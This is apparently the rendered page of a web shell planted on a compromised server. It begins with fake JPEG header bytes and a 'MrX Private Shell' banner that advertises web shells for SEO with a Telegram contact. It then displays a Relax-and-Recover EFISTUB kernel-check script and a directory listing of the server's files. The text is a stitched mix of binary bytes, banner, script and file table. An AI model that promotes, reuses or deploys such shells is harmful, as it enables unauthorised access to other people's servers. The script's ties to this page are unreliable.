����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
is_true $EFI_STUB || return 0
# Despite user made his choice, check if kernel can really boot with EFISTUB.
grep -q -i "EFI stub" $KERNEL_FILE || Error "$KERNEL_FILE is not compiled with EFISTUB support"
Log "EFI_STUB: Using kernel $KERNEL_FILE with EFISTUB support"
Log "EFI_STUB: Checking if Kernel file: $KERNEL_FILE is hosted on vfat filesystem"
esp_mountpoint=$( df -P "${KERNEL_FILE}" | tail -1 | awk '{print $6}' )
uefi_fs_type=$(df -T "$esp_mountpoint" | tail -n +2 | head -n 1 | awk '{print $2}')
[[ "$uefi_fs_type" != "vfat" ]] && Error "EFI_STUB: Kernel file: $KERNEL_FILE is not hosted on vfat filesystem"
Log "EFI_STUB: Kernel file: $KERNEL_FILE is hosted on vfat filesystem"
local info_file=$VAR_DIR/layout/config/EFI_STUB_info.txt
# Save kernel location and options for `rear recover' phase.
# During recover mount point holding kernel will be considered ESP,
# and these information will be later used for efibootmgr.
Log "EFI_STUB: Saving information for later use"
echo $KERNEL_FILE > $info_file
# Save boot parameters from current boot.
# If EFI_STUB_EFIBOOTMGR_ARGS is not set by user, we will later use them.
cat /proc/cmdline >> $info_file
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 200_include_getty.sh | File | 833 B | 0644 |
|
| 200_include_serial_console.sh | File | 5.96 KB | 0644 |
|
| 210_include_dhclient.sh | File | 6.72 KB | 0644 |
|
| 220_include_lvm_tools.sh | File | 587 B | 0644 |
|
| 230_include_md_tools.sh | File | 154 B | 0644 |
|
| 240_include_multipath_tools.sh | File | 578 B | 0644 |
|
| 280_include_systemd.sh | File | 1.48 KB | 0644 |
|
| 280_include_virtualbox.sh | File | 646 B | 0644 |
|
| 280_include_vmware_tools.sh | File | 394 B | 0644 |
|
| 290_include_drbd.sh | File | 280 B | 0644 |
|
| 300_check_backup_and_output_url.sh | File | 1.37 KB | 0644 |
|
| 300_include_grub_tools.sh | File | 2.76 KB | 0644 |
|
| 310_include_cap_utils.sh | File | 882 B | 0644 |
|
| 400_guess_kernel.sh | File | 6.64 KB | 0644 |
|
| 500_EFISTUB_check_kernel.sh | File | 1.14 KB | 0644 |
|